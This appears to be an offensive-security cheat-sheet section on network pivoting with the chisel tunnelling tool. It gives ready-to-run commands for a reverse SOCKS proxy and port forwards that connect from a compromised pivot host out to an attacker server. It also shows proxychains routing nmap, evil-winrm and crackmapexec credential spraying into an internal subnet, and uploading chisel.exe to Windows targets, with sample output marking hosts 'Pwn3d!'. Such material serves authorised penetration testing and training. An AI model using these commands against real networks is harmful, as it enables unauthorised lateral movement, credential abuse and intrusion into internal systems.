CHISEL (NO SSH NEEDED)
Start chisel server (attacker)
Run on your machine — Listens for client connections
chisel server --reverse --port 8000
Example Output
chisel server --reverse --port 8000
2026/02/24 server: Listening on http://0.0.0.0:8000
2026/02/24 server: session#1: Client connected
(Waiting for agent connections)
Chisel client - reverse SOCKS
Run on pivot host — Creates SOCKS5 proxy on attacker:1080
chisel client ATTACKER_IP:8000 R:socks
Example Output
Attacker: chisel server --reverse --port 8000
Pivot: chisel client 10.10.14.2:8000 R:socks
[server] session#1: tun created
[server] session#1: proxy 127.0.0.1:1080
proxychains nmap -sT -Pn 172.16.1.10
(SOCKS proxy without SSH)
Chisel client - port forward
Forward specific port — Access internal:80 on your localhost:8080
chisel client ATTACKER_IP:8000 R:8080:INTERNAL_TARGET:80
Example Output
Attacker: chisel server --reverse --port 8000
Pivot: chisel client 10.10.14.2:8000 R:8080:172.16.1.10:80
[server] session#1: tun created
[server] Reverse port forwarding 0.0.0.0:8080 => 172.16.1.10:80
curl http://127.0.0.1:8080
(Specific port forward instead of full SOCKS proxy)
Use with proxychains
Route tools through tunnel — Same as SSH SOCKS proxy
proxychains nmap -sT -Pn INTERNAL_IP
proxychains evil-winrm -i INTERNAL_IP -u user -p pass
Example Output
proxychains crackmapexec smb 172.16.1.0/24 -u john -p Password1
172.16.1.10 [+] corp\john (Pwn3d!)
172.16.1.20 [-] corp\john
172.16.1.30 [+] corp\john (Pwn3d!)
(Enumerated entire internal subnet through chisel)
Chisel Windows client
Works on Windows too — Upload chisel.exe to target
chisel.exe client ATTACKER_IP:8000 R:socks
Example Output
chisel.exe client 10.10.14.2:8000 R:socks
2026/02/24 client: Connected
(Same as Linux client, works on Windows targets)
proxychains from attacker now reaches internal net